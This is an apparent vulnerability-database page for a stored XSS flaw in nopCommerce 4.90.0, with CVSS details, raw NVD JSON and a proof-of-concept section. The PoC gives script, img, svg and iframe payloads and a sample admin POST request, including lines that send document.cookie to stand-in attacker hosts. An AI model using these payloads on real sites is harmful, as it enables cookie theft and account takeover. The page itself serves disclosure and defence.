Security Vulnerability Report
CVE-2025-65592 CVSS 6.1 MEDIUM

CVE-2025-65592

Published: 2025-12-16 19:15:59
Last Modified: 2025-12-19 16:40:13

Description

nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) in the product management functionality. Malicious payloads inserted into the "Product Name" and "Short Description" fields are stored in the backend database and executed automatically whenever a user views the affected pages.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:* - VULNERABLE
nopCommerce 4.90.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-65592 PoC - Stored XSS in nopCommerce Product Management
// Target: nopCommerce 4.90.0
// Attack Vector: Product Name or Short Description fields

// Step 1: Identify the product creation/editing endpoint
// Typically: /Admin/Product/Create or /Admin/Product/Edit/{productId}

// Step 2: Inject XSS payload in Product Name field
const xssPayload1 = '<script>console.log(document.cookie)</script>';

// Alternative payload using img tag
const xssPayload2 = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\\>">';

// Alternative payload using SVG element
const xssPayload3 = '<svg onload="eval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))">';

// Step 3: Inject XSS payload in Short Description field
const xssPayload4 = '<iframe src="javascript:alert(document.domain)">';

// Example HTTP POST request (simplified)
/*
POST /Admin/Product/Save HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

Name=<script>alert(document.cookie)</script>&ShortDescription=<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>&
*/

// Step 4: When any user views the affected product page, the XSS will execute automatically

References

https://seclists.org/fulldisclosure/2025/Dec/19 (Mailing List, Third Party Advisory)
https://www.nopcommerce.com/ (Product)
http://seclists.org/fulldisclosure/2025/Dec/19 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65592", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:15:58.967", "lastModified": "2025-12-19T16:40:13.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) in the product management functionality. Malicious payloads inserted into the \"Product Name\" and \"Short Description\" fields are stored in the backend database and executed automatically whenever a user views the affected pages."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:*", "matchCriteriaId": "1FC64557-EDFD-4460-8793-8C452638D782"}]}]}], "references": [{"url": "https://seclists.org/fulldisclosure/2025/Dec/19", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://www.nopcommerce.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/19", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}